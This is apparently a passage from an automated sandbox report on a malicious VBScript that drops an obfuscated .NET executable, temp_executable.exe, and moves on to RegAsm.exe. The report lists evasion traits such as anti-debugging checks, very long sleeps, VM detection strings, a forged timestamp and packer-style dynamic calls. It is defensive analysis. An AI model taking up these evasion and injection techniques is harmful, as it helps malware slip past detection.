Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: MXCJKSD12.pdb source: wscript.exe, 00000000.00000002.2086216650.000001615D7A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2054204916.000001615D7A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2082243144.000001615D7C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2082427583.000001615D7A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2086853744.000001615E450000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2083593147.000001615D7A7000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000002.00000000.2058303544.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe.0.dr

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

.NET source code contains method to dynamically call methods (often used by packers)

Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs	.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777259)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777260)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777257))})
Source: 0.2.wscript.exe.1615e473b90.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs	.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777259)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777260)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777257))})
Source: 0.3.wscript.exe.1615d7c0060.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777259)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777260)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777257))})

Binary contains a suspicious time stamp

Source: temp_executable.exe.0.dr

Static PE information: 0xEF084109 [Tue Jan 29 10:59:21 2097 UTC]

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004030E0 push eax; ret	3_2_004030E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041488D pushfd ; iretd	3_2_0041488F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401966 push esi; iretd	3_2_00401967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00402179 push ss; retf	3_2_0040213D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041F1A0 push ss; ret	3_2_0041F1A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D4C7 push edx; ret	3_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D4CD push edx; ret	3_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00418DD0 push ebp; ret	3_2_00418DE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D589 push edx; ret	3_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004116BB push edi; retf	3_2_004116BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042373B push es; ret	3_2_004237D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00413FC3 push edi; ret	3_2_00413FCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004237B1 push es; ret	3_2_004237D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C809AD push ecx; mov dword ptr [esp], ecx	3_2_02C809B6

Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: 'D4r4O0AxSI', 'YMx1IyBoNY6Ba', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: temp_executable.exe.0.dr, R2mIapWar4cwoqqx6Q.cs	High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Source: 0.2.wscript.exe.1615e473b90.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: 'D4r4O0AxSI', 'YMx1IyBoNY6Ba', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 0.2.wscript.exe.1615e473b90.1.raw.unpack, R2mIapWar4cwoqqx6Q.cs	High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Source: 0.3.wscript.exe.1615d7c0060.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: 'D4r4O0AxSI', 'YMx1IyBoNY6Ba', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 0.3.wscript.exe.1615d7c0060.0.raw.unpack, R2mIapWar4cwoqqx6Q.cs	High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'

Drops PE files

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory allocated: 2F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory allocated: 31C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory allocated: 2FE0000 memory reserve \| memory write watch	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_02CFD1C0 rdtsc

3_2_02CFD1C0

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found large amount of non-executed APIs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 0.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3596	Thread sleep count: 214 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3596	Thread sleep count: 277 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3568	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3664	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6488	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: temp_executable.exe, 00000002.00000002.2078582648.0000000001515000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
Source: wscript.exe, 00000000.00000003.2083664464.000001615B716000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.2083664464.000001615B716000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process queried: DebugPort

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_02CFD1C0 rdtsc

3_2_02CFD1C0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00417663 LdrLoadDll,

3_2_00417663

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0 mov eax, dword ptr fs:[00000030h]	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0 mov eax, dword ptr fs:[00000030h]	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0 mov eax, dword ptr fs:[00000030h]	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0 mov eax, dword ptr fs:[00000030h]	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0 mov eax, dword ptr fs:[00000030h]	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0 mov eax, dword ptr fs:[00000030h]	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0 mov eax, dword ptr fs:[00000030h]	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A2C3 mov eax, dword ptr fs:[00000030h]	3_2_02C8A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A2C3 mov eax, dword ptr fs:[00000030h]	3_2_02C8A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A2C3 mov eax, dword ptr fs:[00000030h]	3_2_02C8A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A2C3 mov eax, dword ptr fs:[00000030h]	3_2_02C8A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A2C3 mov eax, dword ptr fs:[00000030h]	3_2_02C8A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C892C5 mov eax, dword ptr fs:[00000030h]	3_2_02C892C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C892C5 mov eax, dword ptr fs:[00000030h]	3_2_02C892C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B2D3 mov eax, dword ptr fs:[00000030h]	3_2_02C7B2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B2D3 mov eax, dword ptr fs:[00000030h]	3_2_02C7B2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B2D3 mov eax, dword ptr fs:[00000030h]	3_2_02C7B2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAF2D0 mov eax, dword ptr fs:[00000030h]	3_2_02CAF2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAF2D0 mov eax, dword ptr fs:[00000030h]	3_2_02CAF2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C902E1 mov eax, dword ptr fs:[00000030h]	3_2_02C902E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C902E1 mov eax, dword ptr fs:[00000030h]	3_2_02C902E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C902E1 mov eax, dword ptr fs:[00000030h]	3_2_02C902E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3F2F8 mov eax, dword ptr fs:[00000030h]	3_2_02D3F2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D552E2 mov eax, dword ptr fs:[00000030h]	3_2_02D552E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C792FF mov eax, dword ptr fs:[00000030h]	3_2_02C792FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
